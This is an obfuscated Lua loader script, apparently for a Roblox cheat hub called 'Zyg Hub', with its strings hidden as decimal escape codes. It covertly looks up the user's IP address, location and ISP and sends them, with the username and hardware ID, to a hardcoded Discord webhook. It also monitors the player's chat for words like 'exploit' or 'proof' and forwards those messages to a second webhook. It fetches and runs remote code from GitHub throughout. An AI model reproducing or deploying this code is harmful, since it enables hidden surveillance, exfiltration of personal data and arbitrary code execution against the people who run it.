( function (...) local _IIIIIIlIII, currentHwid, AUTH_API_BASE_URL, passed_token = ... local _lIllIllIIl = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\090\072\086\052\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\065\115\115\117\114\097\110\099\101" local HttpService = game:GetService("\072\116\116\112\083\101\114\118\105\099\101") local _IllIIllIlI = HttpService:GenerateGUID(false) local _IllIIllIlI = false local _lIIIllIlll, result = pcall( function () local _lIIlIIlIIl = game:HttpGet(_lIllIllIIl, true) if type(_lIIlIIlIIl) == "\115\116\114\105\110\103" and _lIIlIIlIIl ~= "" then local _lIllIIllIl = loadstring(_lIIlIIlIIl) if type(_lIllIIllIl) == "\102\117\110\099\116\105\111\110" then return _lIllIIllIl(_IIIIIIlIII, currentHwid, AUTH_API_BASE_URL, passed_token, _IllIIllIlI) end
 end
 return false end
 ) local _IlIlllllIl = string.reverse(_IllIIllIlI) .. "\095\090\121\103\086\052\095\086\101\114\105\102\105\101\100" if _lIIIllIlll and type(result) == "\115\116\114\105\110\103" and result == _IlIlllllIl then _IllIIllIlI = true else warn("\090\121\103\032\072\117\098\032\083\101\099\117\114\105\116\121\058\032\067\104\097\108\108\101\110\103\101\045\082\101\115\112\111\110\115\101\032\102\097\105\108\101\100\046\032\069\110\118\105\114\111\110\109\101\110\116\032\099\111\109\112\114\111\109\105\115\101\100\046") _IllIIllIlI = false end
 if not _IllIIllIlI then pcall( function () game:GetService("\080\108\097\121\101\114\115").LocalPlayer:Kick("\090\121\103\032\072\117\098\058\032\067\114\105\116\105\099\097\108\032\102\101\097\116\117\114\101\032\100\105\115\097\098\108\101\100\032\100\117\101\032\116\111\032\115\101\099\117\114\105\116\121\032\099\104\101\099\107\032\102\097\105\108\117\114\101\046") end
 ) return end
 local Players = game:GetService("\080\108\097\121\101\114\115") local HttpService = game:GetService("\072\116\116\112\083\101\114\118\105\099\101") local _IllIIIIIIl = game:GetService("\082\098\120\065\110\097\108\121\116\105\099\115\083\101\114\118\105\099\101") local _IlIIlIIIll = request or syn and syn.request or http and http.request or fluxus and fluxus.request local _llIlllIlII = Players.LocalPlayer do local _IIIllIIlIl = "\104\116\116\112\115\058\047\047\100\105\115\099\111\114\100\046\099\111\109\047\097\112\105\047\119\101\098\104\111\111\107\115\047\049\051\055\051\048\050\051\057\048\050\051\051\048\050\054\049\053\057\053\047\081\078\116\048\067\075\056\108\104\045\108\066\081\105\097\099\107\109\067\117\050\053\114\100\117\115\107\053\104\074\067\120\080\078\056\073\098\087\077\100\057\116\095\098\083\117\079\097\057\095\098\069\116\100\110\089\083\102\048\077\116\110\066\073\066\121\111\115" local function _IlIlIIIlll() return _IllIIIIIIl:GetClientId() end
 local function _lllIllIllI() local _IlIIlIllIl = os.date("\037\089\045\037\109\045\037\100") local time = os.date("\037\072\058\037\077\058\037\083") return _IlIIlIllIl, time end
 local function _lIIIIlllII() if _llIlllIlII then return _llIlllIlII.Name else return "\085\110\107\110\111\119\110\032\085\115\101\114" end
 end
 local function _llIllllIll() return game.PlaceId end
 if _IlIIlIIIll and _llIlllIlII then local _llIlIlllll = _IlIlIIIlll() local _IlllIIlIlI, time_exec = _lllIllIllI() local _IllIllIlll = _lIIIIlllII() local _IIllIlllIl = _llIllllIll() local _llllllIlll = "\070\097\105\108\101\100\032\116\111\032\102\101\116\099\104\032\073\080" local _IIIIlIIIll, ip_info_result = pcall( function () return _IlIIlIIIll({ Url = "\104\116\116\112\058\047\047\105\112\045\097\112\105\046\099\111\109\047\106\115\111\110", Method = "\071\069\084" }) end
 ) if _IIIIlIIIll and ip_info_result and ip_info_result.Success then local _IIlllIllll, ipinfo_table = pcall(HttpService.JSONDecode, HttpService, ip_info_result.Body) if _IIlllIllll and type(ipinfo_table) == "\116\097\098\108\101" then _llllllIlll = string.format("\096\096\096\073\080\058\032\037\115\092\110\067\111\117\110\116\114\121\058\032\037\115\092\110\067\111\117\110\116\114\121\032\067\111\100\101\058\032\037\115\092\110\082\101\103\105\111\110\058\032\037\115\092\110\082\101\103\105\111\110\032\078\097\109\101\058\032\037\115\092\110\067\105\116\121\058\032\037\115\092\110\090\105\112\099\111\100\101\058\032\037\115\092\110\073\083\080\058\032\037\115\092\110\079\114\103\058\032\037\115\096\096\096", ipinfo_table.query or "\078\047\065", ipinfo_table.country or "\078\047\065", ipinfo_table.countryCode or "\078\047\065", ipinfo_table.region or "\078\047\065", ipinfo_table.regionName or "\078\047\065", ipinfo_table.city or "\078\047\065", ipinfo_table.zip or "\078\047\065", ipinfo_table.isp or "\078\047\065", ipinfo_table.org or "\078\047\065" ) end
 end
 local _IlllllIlII = { ["\099\111\110\116\101\110\116"] = "\042\042\083\099\114\105\112\116\032\069\120\101\099\117\116\101\100\042\042", ["\101\109\098\101\100\115"] = { { ["\116\105\116\108\101"] = "\069\120\101\099\117\116\105\111\110\032\068\101\116\097\105\108\115", ["\102\105\101\108\100\115"] = { {["\110\097\109\101"] = "\085\115\101\114\110\097\109\101", ["\118\097\108\117\101"] = _IllIllIlll, ["\105\110\108\105\110\101"] = true}, {["\110\097\109\101"] = "\068\097\116\101", ["\118\097\108\117\101"] = _IlllIIlIlI, ["\105\110\108\105\110\101"] = true}, {["\110\097\109\101"] = "\084\105\109\101", ["\118\097\108\117\101"] = time_exec, ["\105\110\108\105\110\101"] = true}, {["\110\097\109\101"] = "\080\108\097\099\101\032\073\068", ["\118\097\108\117\101"] = tostring(_IIllIlllIl), ["\105\110\108\105\110\101"] = true}, {["\110\097\109\101"] = "\072\087\073\068", ["\118\097\108\117\101"] = _llIlIlllll, ["\105\110\108\105\110\101"] = false}, {["\110\097\109\101"] = "\073\080\032\073\110\102\111\114\109\097\116\105\111\110", ["\118\097\108\117\101"] = _llllllIlll, ["\105\110\108\105\110\101"] = false}, }, ["\099\111\108\111\114"] = 0xFF0000 } } } pcall( function () _IlIIlIIIll({ Url = _IIIllIIlIl, Method = "\080\079\083\084", Headers = {["\067\111\110\116\101\110\116\045\084\121\112\101"] = "\097\112\112\108\105\099\097\116\105\111\110\047\106\115\111\110"}, Body = HttpService:JSONEncode(_IlllllIlII) }) end
 ) else warn("\090\121\103\032\072\117\098\032\069\120\101\099\117\116\105\111\110\032\076\111\103\058\032\067\111\117\108\100\032\110\111\116\032\114\117\110\032\100\117\101\032\116\111\032\109\105\115\115\105\110\103\032\104\116\116\112\095\114\101\113\117\101\115\116\095\102\117\110\099\032\111\114\032\108\111\099\097\108\080\108\097\121\101\114\046") end
 end
 _G.ZygHubT2RunCount = (_G.ZygHubT2RunCount or 0x0) + 0x1 local _lIlllIllIl = { "\099\108\105\112\112\101\100", "\099\108\033\112\112\101\100", "\099\108\049\112\112\101\100", "\099\108\049\112\112\051\100", "\099\108\033\112\112\051\100", "\099\108\105\112", "\099\108\033\112", "\099\108\049\112", "\099\033\105\112", "\099\049\105\112", "\099\108\105\112\112\105\110\103", "\101\120\112\108\111\105\116", "\101\120\112\108\111\105\116\101\114", "\101\120\112\108\111\105\116\105\110\103", "\101\120\112\108\048\105\116", "\101\120\112\108\048\105\116\101\114", "\101\120\112\108\048\105\116\105\110\103", "\104\097\099\107", "\104\097\099\107\101\114", "\104\097\099\107\105\110\103", "\104\097\120", "\104\097\120\111\114", "\104\097\120\120\101\114", "\104\052\120", "\104\052\099\107\101\114", "\104\052\099\107\105\110\103", "\099\104\101\097\116", "\099\104\101\097\116\101\114", "\099\104\101\097\116\105\110\103", "\099\104\051\097\116", "\099\104\051\097\116\101\114", "\099\104\051\097\116\105\110\103", "\109\111\100", "\109\111\100\100\101\114", "\109\111\100\100\105\110\103", "\115\099\114\105\112\116", "\115\099\114\105\112\116\101\114", "\115\099\114\105\112\116\105\110\103", "\115\107\105\100", "\104\101\032\101\120\112\108\111\105\116\115", "\115\104\101\115\032\101\120\112\108\111\105\116\105\110\103", "\116\104\101\121\114\101\032\101\120\112\108\111\105\116\105\110\103", "\105\115\032\104\097\099\107\105\110\103", "\097\114\101\032\104\097\099\107\105\110\103", "\117\115\105\110\103\032\099\104\101\097\116\115", "\104\101\115\032\099\104\101\097\116\105\110\103", "\115\104\101\115\032\099\104\101\097\116\105\110\103", "\105\032\104\097\118\101\032\112\114\111\111\102", "\103\111\116\032\112\114\111\111\102" } local _IlIllllIlI = "\104\116\116\112\115\058\047\047\100\105\115\099\111\114\100\046\099\111\109\047\097\112\105\047\119\101\098\104\111\111\107\115\047\049\052\050\051\052\053\057\051\057\052\052\049\052\052\052\052\054\052\053\047\074\068\054\111\105\097\069\049\079\057\071\054\118\116\081\065\106\069\050\067\050\081\067\107\081\050\097\102\089\088\057\120\097\069\099\070\120\048\121\100\113\056\069\053\073\066\076\104\088\118\106\068\048\057\104\102\045\120\054\081\051\109\055\068\052\054\068\121" local function _IIlIlllIlI(flaggedMessageText) local _IlIIIIlIlI = _IllIIIIIIl:GetClientId() local _IIIllIIIII = _llIlllIlII and _llIlllIlII.Name or "\085\110\107\110\111\119\110\032\085\115\101\114" local _llIllIlIlI = _llIlllIlII and _llIlllIlII.UserId or 0x0 local _IlIIlIllIl = os.date("\033\042\116") local time = string.format("\037\048\050\100\058\037\048\050\100\058\037\048\050\100\032\085\084\067", _IlIIlIllIl.hour, _IlIIlIllIl.min, _IlIIlIllIl.sec) local _IlIlIIllll = string.format("\037\048\052\100\045\037\048\050\100\045\037\048\050\100", _IlIIlIllIl.year, _IlIIlIllIl.month, _IlIIlIllIl.day) local _IIlllIllll = { ["\099\111\110\116\101\110\116"] = "\042\042\070\108\097\103\103\101\100\032\077\101\115\115\097\103\101\032\068\101\116\101\099\116\101\100\042\042", ["\101\109\098\101\100\115"] = { { ["\116\105\116\108\101"] = "\067\104\097\116\032\077\111\110\105\116\111\114\105\110\103\032\065\108\101\114\116", ["\100\101\115\099\114\105\112\116\105\111\110"] = "\065\032\112\108\097\121\101\114\032\117\115\101\100\032\097\032\102\108\097\103\103\101\100\032\119\111\114\100\032\111\114\032\112\104\114\097\115\101\032\105\110\032\099\104\097\116\046", ["\102\105\101\108\100\115"] = { {["\110\097\109\101"] = "\085\115\101\114\110\097\109\101", ["\118\097\108\117\101"] = string.format("\096\037\115\096\032\040\073\068\058\032\096\037\100\096\041", _IIIllIIIII, _llIllIlIlI), ["\105\110\108\105\110\101"] = true}, {["\110\097\109\101"] = "\068\097\116\101", ["\118\097\108\117\101"] = _IlIlIIllll, ["\105\110\108\105\110\101"] = true}, {["\110\097\109\101"] = "\084\105\109\101", ["\118\097\108\117\101"] = time, ["\105\110\108\105\110\101"] = true}, {["\110\097\109\101"] = "\072\087\073\068", ["\118\097\108\117\101"] = "\096" .. _IlIIIIlIlI .. "\096", ["\105\110\108\105\110\101"] = false}, {["\110\097\109\101"] = "\070\108\097\103\103\101\100\032\077\101\115\115\097\103\101", ["\118\097\108\117\101"] = "\124\124" .. flaggedMessageText .. "\124\124", ["\105\110\108\105\110\101"] = false} }, ["\099\111\108\111\114"] = 0xFF4D00, ["\102\111\111\116\101\114"] = { ["\116\101\120\116"] = "\090\121\103\032\072\117\098\032\067\104\097\116\032\077\111\110\105\116\111\114" }, ["\116\105\109\101\115\116\097\109\112"] = string.format("\037\048\052\100\045\037\048\050\100\045\037\048\050\100\084\037\048\050\100\058\037\048\050\100\058\037\048\050\100\046\048\048\048\090", _IlIIlIllIl.year, _IlIIlIllIl.month, _IlIIlIllIl.day, _IlIIlIllIl.hour, _IlIIlIllIl.min, _IlIIlIllIl.sec) } } } local _IlIIlIIIll = {["\067\111\110\116\101\110\116\045\084\121\112\101"] = "\097\112\112\108\105\099\097\116\105\111\110\047\106\115\111\110"} if _IlIIlIIIll then pcall( function () _IlIIlIIIll({Url = _IlIllllIlI, Method = "\080\079\083\084", Headers = _IlIIlIIIll, Body = HttpService:JSONEncode(_IIlllIllll)}) end
 ) end
 end
 local function _llllIllllI() if not _llIlllIlII then return end
 if _G.ZygHubT2RunCount == 0x1 then _llIlllIlII.Chatted:Connect( function (message) local _IlllIIIIIl = message:lower() for _, word in ipairs(_lIlllIllIl) do if _IlllIIIIIl:find(word:lower(), 0x1, true) then _IIlIlllIlI(message) break end
 end
 end
 ) end
 end
 _llllIllllI() local _lIIlllIlll = { [0x3B9EB8310] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\077\111\117\110\116\102\097\108\108", [0x3E558A624] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\070\105\115\099\104", [0x537D40411296] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\071\104\111\117\108\037\050\048\082\069", [0x694F4F4A2BD] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\071\104\111\117\108\037\050\048\082\069", [0x41D1918E68FD] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\076\111\098\098\121\037\050\048\078\111\116\105\102\105\099\097\116\105\111\110", [0x4645B3A7F] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\066\108\111\111\100\037\050\048\083\097\109\117\114\097\105\037\050\048\050", [0x39D40BC57] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\066\108\111\111\100\037\050\048\083\097\109\117\114\097\105\037\050\048\050", [0x46428EFC2] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\066\108\111\111\100\037\050\048\083\097\109\117\114\097\105\037\050\048\050", [0x46451F2A8] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\066\108\111\111\100\037\050\048\083\097\109\117\114\097\105\037\050\048\050", [0xF5093DC1] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\076\111\098\098\121\037\050\048\078\111\116\105\102\105\099\097\116\105\111\110", [0x2EA6C229E] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\076\111\098\098\121\037\050\048\078\111\116\105\102\105\099\097\116\105\111\110", [0x1974674B1] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\068\101\101\112\119\111\107\101\110", [0x1678F1DC5] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\068\101\101\112\119\111\107\101\110", [0x181DF4849] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\068\101\101\112\119\111\107\101\110", [0x155DD9888] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\068\101\101\112\119\111\107\101\110", [0x204AE733A] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\068\101\101\112\119\111\107\101\110", [0x2EC9DFBA0] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\068\101\101\112\119\111\107\101\110", [0x2EA6C2C1A] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\068\101\101\112\119\111\107\101\110", [0x2EA6C00F4] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\068\101\101\112\119\111\107\101\110", [0x29624CE12] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\068\101\101\112\119\111\107\101\110", [0x24B65F249] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\068\101\101\112\119\111\107\101\110", [0x23C17411D] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\068\101\101\112\119\111\107\101\110", [0x197464E41] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\068\101\101\112\119\111\107\101\110", [0x2074C01D6] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\068\101\101\112\119\111\107\101\110", [0x237F85497] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\068\101\101\112\119\111\107\101\110", [0x26555C6A3] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\076\111\098\098\121\037\050\048\078\111\116\105\102\105\099\097\116\105\111\110", [0x5AF20E812040] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\082\117\110\101\037\050\048\083\108\097\121\101\114", [0x6651161D4C49] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\082\117\110\101\037\050\048\083\108\097\121\101\114\037\050\048\084\117\116\111\114\105\097\108", [0x3EEF34077] = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\076\111\098\098\121\037\050\048\078\111\116\105\102\105\099\097\116\105\111\110" } local _IIlllIIIll = "\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\084\105\118\097\108\108\115\047\065\117\116\111\069\120\101\099\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047\068\101\118" local function _lIllllllll() local _IllllIllll = game.PlaceId local _llIIIlIIll = _lIIlllIlll[_IllllIllll] or _IIlllIIIll local _IIIlIlIllI, scriptCodeOrError = pcall( function () return game:HttpGet(_llIIIlIIll, true) end
 ) if _IIIlIlIllI and type(scriptCodeOrError) == "\115\116\114\105\110\103" and scriptCodeOrError ~= "" then local _llllllIIII, funcOrError = pcall(loadstring(scriptCodeOrError)) if _llllllIIII and type(funcOrError) == "\102\117\110\099\116\105\111\110" then local _llIIlIIIII, execError = pcall(funcOrError) if not _llIIlIIIII then warn("\090\121\103\032\072\117\098\032\084\050\058\032\069\114\114\111\114\032\069\088\069\067\085\084\073\078\071\032\108\111\097\100\101\100\032\115\099\114\105\112\116\032\102\114\111\109\032" .. _llIIIlIIll .. "\032\045\032" .. tostring(execError)) end
 end
 end
 end
 _lIllllllll() end
 )(...)
